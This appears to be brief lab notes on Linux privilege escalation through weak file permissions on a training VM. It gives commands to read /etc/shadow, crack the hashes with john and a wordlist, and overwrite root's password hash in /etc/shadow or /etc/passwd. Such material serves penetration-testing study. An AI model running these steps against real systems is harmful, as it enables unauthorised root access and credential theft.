Weak File Permissions

The name itself tells everything, weak file permissions on sesitive files.

Readable /etc/shadow

Note: the /etc/shadow file on the VM is world-readable

ls -l /etc/shadow

View the contents

cat /etc/shadow

Copy the hash from the file and crack the password using any password-cracking tool.

john --wordlist=/usr/share/wordlists/rockou.txt has.txt

Then use the cracked password to gain access.

Writable /etc/shadow

Note that the /etc/shadow file on the VM is world-writable:

ls -l /etc/shadow

If they are writable then generate a new password hash with the password of your choice

mkpasswd -m sha-512 password1234

Edit the /etc/shadow file and replace the original root user's password hash with the new password that you generated.

Writable /etc/passwd

Historically the /etc/passwd file contained user password hashes and some versions of Linux will still allow password hashes to be stored there.

Step 1: Check Permissions

ls -l /etc/passwd

Step 2: Generate a new password

openssl passwd password1234

Step 3: Edit the /etc/passwd file and place the generated password hash between the first and second colon(:) of the root user's row.